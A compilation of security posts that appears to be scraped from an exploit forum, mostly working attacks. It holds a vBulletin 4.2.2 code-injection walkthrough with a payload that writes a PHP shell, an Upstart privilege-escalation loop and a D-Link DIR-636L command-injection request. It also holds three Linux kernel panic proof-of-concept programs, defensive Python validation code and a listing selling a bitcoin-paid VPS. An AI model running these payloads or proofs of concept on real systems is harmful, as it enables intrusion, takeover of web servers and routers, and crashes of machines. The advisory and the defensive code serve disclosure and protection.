[+] Discovered By: Dariush Nasirpour (Net.Edit0r)
[+] My Homepage: black-hg.org / nasirpour.info
[+] Date: [2015 27 February]
[+] Vendor Homepage: vBulletin.com
[+] Tested on: [vBulletin 4.2.2]
[+] Greeting : Ali Razmjoo - Ehsan Nezami - Arash Shams - Ramin Shahkar and all my friends ( #bhg )
#################################################################################################################

Remote Code Injection:
+++++++++++++++++++++++++

1) You must register in the vBulletin: http://www.victim.com/register.php example: [blackhat]

2) Go to your user profile, example: [http://black-hg.org/cc/members/blackhat.html]

3) Post something in visitor message and record post data with Live HTTP Headers.
[example]:
message_backup=&message=For-Test-Sample&wysiwyg=1&sbutton=%D8%A7%D8%B1%D8%B3%D8%A7%D9%84+%D9%BE%DB%8C%D8%BA%D8%A7%D9%85&fromquickcomment=1&s=&securitytoken=1425024074-5bcfb5b83d466416ed95e80021abee86063cdf6e&do=message&u=110&u2=&loggedinuser=110&parseurl=1&lastcomment=1425022046&allow_ajax_qc=1&fromconverse=

4) Change message to anything: "For-Test-Sample" => "ALEEEEEEEEX" [because vBulletin doesn't let you send the same comment twice]
[Now post this with HackBar:]
URL: http://black-hg.org/cc/visitormessage.php?do=message
[Post data]
message_backup=&message=ALEEEEEEEEX&wysiwyg=1&sbutton=%D8%A7%D8%B1%D8%B3%D8%A7%D9%84+%D9%BE%DB%8C%D8%BA%D8%A7%D9%85&fromquickcomment=1&s=&securitytoken=1425024074-5bcfb5b83d466416ed95e80021abee86063cdf6e&do=message&u=110&u2=&loggedinuser=110&parseurl=1&lastcomment=1425022046&allow_ajax_qc=1&fromconverse=
[And referrer data:]
PoC : http://black-hg.org/cc/members/blackhat.html?a=$stylevar[${${file_put_contents("shell.php","hacked[u can upload shell]")}}]"

5) Open HackBar and tamper it with Tamper Data: the referrer data has been URL encoded by the browser, you have to replace this again with Tamper Data:
http://black-hg.org/cc/members/blackhat.html?a=$stylevar[${${file_put_contents("shell.php","hacked[you can upload shell]")}}]"
and submit the request.
################################################################################################################
Source
  18. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Although just reported to Ubuntu, this minor dev-branch issue was already made public. As the launchpad/lkml/... feed-miners should not play all the games alone, and as others may want to learn how beginner errors still make it into packages of quite large distributions, enjoy the power of

```sh
for session in /run/user/*/upstart/sessions/*
do
  env $(cat $session) /sbin/initctl emit rotate-logs >/dev/null 2>&1 || true
done
```

executed as root. See [1]

hd

[1] http://www.halfdog.net/Security/2015/UpstartLogrotationPrivilegeEscalation/

- --
http://www.halfdog.net/
PGP: 156A AE98 B91F 0114 FE88 2BD8 C459 9386 feed a bee
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iEYEARECAAYFAlTwJXEACgkQxFmThv7tq+4LKgCcCKMaOdO0xObIno415g6qZAxp
LZQAnj8giZDPkLYZPD/TVhY958/vXMSJ
=xyAX
-----END PGP SIGNATURE-----
Source
  19. #############################################################################
#
# SWISSCOM CSIRT SECURITY ADVISORY - http://www.swisscom.com/security
#
#############################################################################
#
# CVE ID: CVE-2015-1187
# Product: D-Link DIR636L
# Vendor: D-Link
# Subject: Remote Command Injection - Incorrect Authentication
# Effect: Remotely exploitable
# Author: Tiago Caetano Henriques, tiago.caetanohenriques AT swisscom.com
#         Stephan Rickauer, Swisscom CSIRT (csirt AT wisscom.com)
# Date: March 2nd 2015
#
#############################################################################

Introduction
------------
Tiago Caetano Henriques discovered a security flaw in the D-Link DIR-636L router that enables an attacker on the same network to execute arbitrary commands without being authenticated.

Vulnerable
----------
D-Link DIR-636L and possibly other versions as seen on [1].

Patches
-------
None existent at the moment.

Description
-----------
The D-Link DIR636L (possibly others) incorrectly filters input on the 'ping' tool, which allows injecting arbitrary commands into the router. Secondly, authentication is not being performed correctly. This enables a remote attacker to gain full control of the router, for example to attack other networks in a DDoS-style attack, or even expose computers behind these devices to the internet, as you are able to change firewall/NAT rules on this router.

Attack vector
-------------
A URL-encoded POST request with the values in front of ping_addr= such as the following will go through and will execute the command in front of &.

POST /ping.ccp HTTP/1.1
Host: 192.168.0.1
...
X-Requested-With: XMLHttpRequest
Referer: http://192.168.0.1/tools_vct.asp
Content-Length: 64
Cookie:

ccp_act=ping_v4&ping_addr=%31%39%32%2e%31%36%38%2e%30%2e%31%30%37%20%26%20%2f%62%69%6e%2f%70%69%6e%67%20%39%34%2e%32%33%2e%37%38%2e%32%33%31

Milestones
----------
Nov 30th 2014  Vulnerability discovered by Tiago Caetano Henriques
Dec 18th 2014  Vulnerability reported to Swisscom CSIRT
Jan 7th 2015   CVE ID requested at MITRE
Jan 18th 2015  CVE ID 2015-1187 assigned by MITRE
Feb 2nd 2015   Vendor contact established and provided with technical details
Feb 16th 2015  Vendor acknowledged issue and communicates time line for patches
Feb 26th 2015  Full Disclosure by Peter Adkins
Mar 2nd 2015   Forced Public Release of this Advisory due to the previous Full Disclosure at [1]

References
----------
[1] https://github.com/darkarnium/secpub/tree/master/Multivendor/ncc2
Source
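The root cause described in the advisory is that ping_addr reaches a command line without being checked. As an added example (not from the advisory, Swisscom CSIRT or D-Link), the allow-list validator below accepts only a single IPv4 address or a plain hostname and builds the ping command as an argv list with no shell, and a companion check decodes a URL-encoded ping.ccp body and flags shell metacharacters for logging or IDS use. The request bodies are constructed, using documentation addresses rather than anything from the advisory.

```python
import ipaddress
import re
from urllib.parse import parse_qs

# Hostname per RFC 1123: dot-separated labels of letters, digits and hyphens, at most 253 chars.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)
# Characters that let a value escape a single shell word and start a second command.
_SHELL_META = set("&;|`$()<>\n\r'\"\\ ")


def validate_ping_addr(value: str) -> bool:
    """Allow-list check: exactly one IPv4 address or one plain hostname.

    This is the input check the advisory says the router lacks: a value such as
    '192.0.2.10 & /bin/ping 198.51.100.7' fails because of the spaces and the '&'.
    """
    if not value or len(value) > 253:
        return False
    try:
        ipaddress.IPv4Address(value)  # strict dotted quad, no surrounding junk
        return True
    except ValueError:
        return bool(_HOSTNAME_RE.match(value))


def safe_ping_argv(value: str) -> list:
    """argv for ping without a shell; only a validated address gets this far."""
    if not validate_ping_addr(value):
        raise ValueError("rejected ping_addr: %r" % value)
    return ["/bin/ping", "-c", "4", value]


def inspect_ping_body(body: str) -> dict:
    """Decode a URL-encoded ping.ccp POST body and report injection indicators.

    parse_qs splits on '&' before percent-decoding, so a '%26' inside the value
    (as in the advisory's fully %-encoded payload) stays part of ping_addr and
    shows up here as a literal '&' rather than as a second parameter.
    """
    params = parse_qs(body, keep_blank_values=True)
    addr = params.get("ping_addr", [""])[0]
    meta = sorted(c for c in set(addr) if c in _SHELL_META)
    return {"ping_addr": addr, "metachars": meta,
            "flag": bool(meta) or not validate_ping_addr(addr)}


# Constructed sample bodies using documentation addresses (not captured traffic).
BENIGN_BODY = "ccp_act=ping_v4&ping_addr=192.0.2.10"
# Same shape as the advisory's payload: address, '&', second command, every byte %-encoded.
INJECTED_BODY = "ccp_act=ping_v4&ping_addr=" + "".join(
    "%%%02x" % ord(c) for c in "192.0.2.10 & /bin/ping 198.51.100.7")

if __name__ == "__main__":
    for body in (BENIGN_BODY, INJECTED_BODY):
        print(inspect_ping_body(body))
    print(safe_ping_argv("192.0.2.10"))
```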
  20.
```c
/* ----------------------------------------------------------------------------------------------------
 * cve-2014-9322_poc.c
 *
 * arch/x86/kernel/entry_64.S in the Linux kernel before 3.17.5 does not
 * properly handle faults associated with the Stack Segment (SS) segment
 * register, which allows local users to gain privileges by triggering an IRET
 * instruction that leads to access to a GS Base address from the wrong space.
 *
 * This is a POC to reproduce vulnerability. No exploitation here, just simple kernel panic.
 *
 * I have no merit to writing this poc, I just implemented first part of Rafal Wojtczuk article (this guy is a genius!)
 * More info at : http://labs.bromium.com/2015/02/02/exploiting-badiret-vulnerability-cve-2014-9322-linux-kernel-privilege-escalation/
 *
 *
 * Compile with gcc -fno-stack-protector -Wall -o cve-2014-9322_poc cve-2014-9322_poc.c -lpthread
 *
 * Emeric Nasi - www.sevagas.com
 *-----------------------------------------------------------------------------------------------------*/

// Only works on x86_64 platform
#ifdef __x86_64__

/* ----------------------- Includes ----------------------------*/
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <asm/ldt.h>
#include <pthread.h>
#include <sys/time.h>
#include <inttypes.h>
#include <stdbool.h>
#include <errno.h>
#include <sys/user.h>

/* ----------------------- definitions ----------------------------*/
#define TARGET_KERNEL_MIN "3.0.0"
#define TARGET_KERNEL_MAX "3.17.4"
#define EXPLOIT_NAME "cve-2014-9322"
#define EXPLOIT_TYPE DOS
#define FALSE_SS_BASE 0x10000UL
#define MAP_SIZE 0x10000

/* ----------------------- Global variables ----------------------------*/
struct user_desc new_stack_segment;

/* ----------------------- functions ----------------------------*/

/**
 * Creates a new segment in Local Descriptor Table
 */
static bool add_ldt(struct user_desc *desc, const char *name)
{
    if (syscall(SYS_modify_ldt, 1, desc, sizeof(struct user_desc)) == 0) {
        return true;
    } else {
        printf("[cve_2014_9322 error]: Failed to create %s segment\n", name);
        printf("modify_ldt failed, %s\n", strerror(errno));
        return false;
    }
}

/* Shared with the main thread's busy-wait loop, so it must not be cached in a register */
volatile int FLAG = 0;

void *segManipulatorThread(void *none)
{
    new_stack_segment.entry_number = 0x12;
    new_stack_segment.base_addr = 0x10000;
    new_stack_segment.limit = 0xffff;
    new_stack_segment.seg_32bit = 1;
    new_stack_segment.contents = MODIFY_LDT_CONTENTS_STACK; /* Data, grow-up */
    new_stack_segment.read_exec_only = 0;
    new_stack_segment.limit_in_pages = 0;
    new_stack_segment.seg_not_present = 0;
    new_stack_segment.useable = 0;
    new_stack_segment.lm = 0;

    // Create a new stack segment
    add_ldt(&new_stack_segment, "newSS");

    // Wait for main thread to use new stack segment
    sleep(3);

    // Invalidate stack segment
    new_stack_segment.seg_not_present = 1;
    add_ldt(&new_stack_segment, "newSS disable");
    FLAG = 1;
    sleep(15);
    return NULL;
}

/**
 * DOS poc for cve_2014_9322 vulnerability
 */
int main()
{
    pthread_t thread1;
    uint8_t *code;

    printf("[cve_2014_9322]: Preparing to exploit.\n");

    // map area for false SS
    code = (uint8_t *)mmap((void *)FALSE_SS_BASE, MAP_SIZE, PROT_READ | PROT_WRITE,
                           MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0);
    if (code != (uint8_t *)FALSE_SS_BASE) {
        fprintf(stderr, "[cve_2014_9322 Error]: Unable to map memory at address: %lu\n", FALSE_SS_BASE);
        return -1;
    }

    printf("[cve_2014_9322]: Panic!\n");
    if (pthread_create(&thread1, NULL, segManipulatorThread, NULL) != 0) {
        perror("[cve_2014_9322 error]: pthread_create");
        return -1;
    }

    // Wait for segManipulatorThread to create new stack segment
    sleep(1);

    // Set stack segment to newly created one in segManipulatorThread
    // (0x97 = LDT entry 0x12, table indicator bit set, RPL 3)
    asm volatile ("mov %0, %%ss;" : : "r" (0x97));

    while (FLAG == 0) {}
    sleep(4);
    return 0;
}

#endif // __x86_64__
```
Source
  21.
```c
/* ----------------------------------------------------------------------------------------------------
 * cve-2014-4943_poc.c
 *
 * The PPPoL2TP feature in net/l2tp/l2tp_ppp.c in the Linux kernel through 3.15.6 allows local users to gain privileges by leveraging data-structure
 * differences between an l2tp socket and an inet socket.
 *
 * This is a POC to reproduce vulnerability. No exploitation here, just simple kernel panic.
 * I have tried to exploit this vulnerability and I am sure there is a way (or several) to elevate privileges.
 * There are some kernel structures that can be overwritten but I didn't manage to find the ultimate trick to at least point back to userland.
 * It seems guys at Immunity found a way using race condition.
 *
 *
 * Compile with gcc -fno-stack-protector -Wall -o cve-2014-4943_poc cve-2014-4943_poc.c
 *
 * Emeric Nasi - www.sevagas.com
 *-----------------------------------------------------------------------------------------------------*/

/* ----------------------- Includes ----------------------------*/
#include <netinet/ip.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/mman.h>
#include <linux/net.h>
#include <linux/udp.h>
#include <linux/if.h>
#include <linux/if_pppox.h>
#include <linux/if_pppol2tp.h>

/* ----------------------- Definitions ----------------------------*/
#define TARGET_KERNEL_MIN "3.2.0"
#define TARGET_KERNEL_MAX "3.15.6"
#define EXPLOIT_NAME "cve-2014-4943"

/* ----------------------- functions ----------------------------*/

/**
 * It is possible to modify several parts of socket object using IP options from UDP setsockopt
 * For this POC, IP_OPTIONS is the easiest way to panic kernel
 */
void modifyUDPvalues(int tunnel_fd)
{
    /* Extract from kernel code which is vulnerable, here you can see that both udp_setsockopt
       and ip_setsockopt (on inet_sock) can be used to leverage vulnerability:

    int udp_setsockopt(struct sock *sk, int level, int optname,
                       char __user *optval, unsigned int optlen)
    {
        if (level == SOL_UDP || level == SOL_UDPLITE)
            return udp_lib_setsockopt(sk, level, optname, optval, optlen,
                                      udp_push_pending_frames);
        return ip_setsockopt(sk, level, optname, optval, optlen);
    }
    */
    int ip_options = 0x1;
    if (setsockopt(tunnel_fd, SOL_IP, IP_OPTIONS, &ip_options, 20) == -1) {
        perror("setsockopt (IP_OPTIONS)");
    }
}

/**
 * DOS poc for cve_2014_4943 vulnerability
 */
int main()
{
    int tunnel_fd;
    int tunnel_fd2;
    int udp_fd;

    printf("[cve_2014_4943]: Preparing to exploit.\n");

    /* Create first L2TP socket */
    tunnel_fd = socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP);
    if (tunnel_fd < 0) {
        perror("socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP)");
        return -1;
    }

    /* Create second L2TP socket */
    tunnel_fd2 = socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP);
    if (tunnel_fd2 < 0) {
        perror("socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP)");
        return -1;
    }

    if ((udp_fd = socket(AF_INET, SOCK_DGRAM, 0)) < 0) {
        perror("cannot create socket");
        return -1;
    }

    /* Connect L2TP socket */
    struct sockaddr_pppol2tp sax;
    memset(&sax, 0, sizeof(sax));
    sax.sa_family = AF_PPPOX;
    sax.sa_protocol = PX_PROTO_OL2TP;
    sax.pppol2tp.fd = udp_fd; /* fd of tunnel UDP socket */
    sax.pppol2tp.addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK); // peer_addr->sin_addr.s_addr;
    sax.pppol2tp.addr.sin_port = htons(1337); // peer_addr->sin_port;
    sax.pppol2tp.addr.sin_family = AF_INET;
    sax.pppol2tp.s_tunnel = 8; // tunnel_id;
    sax.pppol2tp.s_session = 0; /* special case: mgmt socket */
    sax.pppol2tp.d_tunnel = 0;
    sax.pppol2tp.d_session = 0; /* special case: mgmt socket */
    if (connect(tunnel_fd, (struct sockaddr *)&sax, sizeof(sax)) < 0) {
        perror("connect failed");
    }

    /* Connect second L2TP socket */
    struct sockaddr_pppol2tp sax2;
    memset(&sax2, 0, sizeof(sax2));
    sax2.sa_family = AF_PPPOX;
    sax2.sa_protocol = PX_PROTO_OL2TP;
    sax2.pppol2tp.s_tunnel = 8; // tunnel_id;
    sax2.pppol2tp.s_session = 1;
    sax2.pppol2tp.d_tunnel = 0;
    sax2.pppol2tp.d_session = 1;
    if (connect(tunnel_fd2, (struct sockaddr *)&sax2, sizeof(sax2)) < 0) {
        perror("connect failed");
    }

    /*
     * Entering critical part
     */
    printf("[cve_2014_4943]: Panic!\n");
    //modifyUDPvalues(tunnel_fd);
    modifyUDPvalues(tunnel_fd2);

    // close opened sockets
    puts("\n [+] Closing sockets...");
    close(tunnel_fd);
    close(tunnel_fd2);
    exit(0);
}
```
Source
  22.
```c
/* ----------------------------------------------------------------------------------------------------
 * cve-2014-3631_poc.c
 *
 * The assoc_array_gc function in the associative-array implementation in lib/assoc_array.c in the Linux kernel before 3.16.3
 * does not properly implement garbage collection, which allows local users to cause a denial of service (NULL pointer dereference and system crash)
 * or possibly have unspecified other impact via multiple "keyctl newring" operations followed by a "keyctl timeout" operation.
 *
 *
 * This is a POC to reproduce vulnerability. No exploitation here, just simple kernel panic.
 *
 * Compile with gcc -fno-stack-protector -Wall -o cve-2014-3631_poc cve-2014-3631_poc.c -lkeyutils
 *
 *
 * Emeric Nasi - www.sevagas.com
 *-----------------------------------------------------------------------------------------------------*/

/* ----------------------- Includes ----------------------------*/
#define _GNU_SOURCE 1
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>
#include <syscall.h>
#include <inttypes.h>
#include <keyutils.h>
#include <fcntl.h>

#define TARGET_KERNEL_MIN "3.13.0"
#define TARGET_KERNEL_MAX "3.16.2"
#define EXPLOIT_NAME "cve-2014-3631"
#define EXPLOIT_TYPE DOS

/* ----------------------- functions ----------------------------*/

/**
 * Poc for cve_2014_3631 vulnerability
 */
int main()
{
    key_serial_t currentKey = 0;
    key_serial_t topKey = 0;
    int i = 0;
    int fp;
    char kname[16] = {0};
    char gc_delay[16] = {0};
    int delay = 0;

    printf("[cve_2014_3631]: Preparing to exploit.\n");

    // fetch garbage collector value..
    fp = open("/proc/sys/kernel/keys/gc_delay", O_RDONLY);
    if (fp == -1) {
        printf("[cve_2014_3631 error]: Could not open /proc/sys/kernel/keys/gc_delay, assuming delay is 5 minutes.\n");
        delay = 300;
    } else {
        // leave room for the terminating NUL so atoi() never runs off the buffer
        read(fp, gc_delay, sizeof(gc_delay) - 1);
        delay = atoi(gc_delay);
        close(fp);
    }

    // Add top key
    topKey = add_key("keyring", "Lvl1K", NULL, 0, KEY_SPEC_USER_KEYRING);
    if (topKey == -1) {
        printf("[cve_2014_3631 error]: keyring fault\n");
        perror("add_key");
        return -1;
    }

    // Add 18 keys to top key
    for (i = 0; i < 18; i++) {
        memset(kname, 0, sizeof(kname));
        memcpy(kname, "Lvl2K_", strlen("Lvl2K_"));
        sprintf(kname + strlen("Lvl2K_"), "%d", i);
        currentKey = add_key("keyring", kname, NULL, 0, topKey);
        if (currentKey == -1) {
            printf("[cve_2014_3631 error]: keyring fault\n");
            perror("add_key");
            return -1;
        }
    }

    /* Entering exploit critical code */
    printf("[cve_2014_3631]: Exploit!\n");

    // Set timeout and wait for garbage collector
    keyctl_set_timeout(currentKey, 2);

    // Wait for garbage collector
    printf("[cve_2014_3631]: Exploit triggered, system will panic in %d seconds..\n", delay);
    return 0;
}
```
Source
  23. Selling a Linux VPS in Teheran, Iran
OS: Linux (your choice)
Bandwidth: 10GB/month; IP in Teheran, Iran, traffic routed through Russia.
HDD: 15GB
RAM: 384Mb
Price: 0.9 BTC / year
Bandwidth, HDD and RAM can be increased for an extra charge. Anyone interested, send me a PM!
  24. @Terchea freelancer[dot]com, if you put your mind to learning you will surely make good money.